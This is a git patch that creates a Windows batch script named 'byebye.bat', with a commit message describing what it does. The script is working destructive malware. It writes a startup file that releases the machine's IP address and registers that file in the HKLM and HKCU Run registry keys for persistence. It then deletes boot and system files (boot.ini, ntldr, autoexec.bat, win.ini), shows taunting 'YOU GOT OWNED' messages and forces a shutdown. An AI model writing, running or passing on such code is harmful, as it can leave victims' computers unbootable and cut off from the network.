From cfc7ed9569af03cdb6f8c75d2d36838f2671041c Mon Sep 17 00:00:00 2001 From: S0u1Sp101T <51326285+SoulSploit@users.noreply.github.com> Date: Sun, 20 Oct 2024 18:48:23 +0200 Subject: [PATCH] Create byebye.bat Creates a Batch File: The script generates a batch file (wimn32.bat) in the C:\Windows directory. This file will run on startup and contains commands to release the IP address. Registry Modifications: It adds entries to the Windows registry to ensure the batch file runs automatically at system startup for both local and current users. Deletes Critical System Files: The script attempts to delete several critical system files, including: C:\autoexec.bat C:\boot.ini C:\ntldr C:\Windows\win.ini Deleting these files can lead to system instability or make the system unbootable. Displays Messages: It shows a message box saying "YOU GOT OWNED!!!", Initiates a Shutdown: It schedules a system shutdown in 7 seconds, warning the user that "A VIRUS IS TAKING OVER C: Drive". --- byebye.bat | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 byebye.bat diff --git a/byebye.bat b/byebye.bat new file mode 100644 index 0000000..7521bc3 --- /dev/null +++ b/byebye.bat @@ -0,0 +1,20 @@ +@echo off + +set "batPath=C:\Windows\wimn32.bat" + +( + echo @echo off + echo break off + echo ipconfig /release + echo end +) > "%batPath%" + +reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WINDOWsAPI" /t REG_SZ /d "%batPath%" /f +reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "CONTROLexit" /t REG_SZ /d "%batPath%" /f + +echo You Have Been HACKED! +pause + +del /q "C:\autoexec.bat" "C:\boot.ini" "C:\ntldr" "C:\Windows\win.ini" +msg * YOU GOT OWNED!!! +shutdown -s -t 7 -c "A VIRUS IS TAKING OVER C: Drive"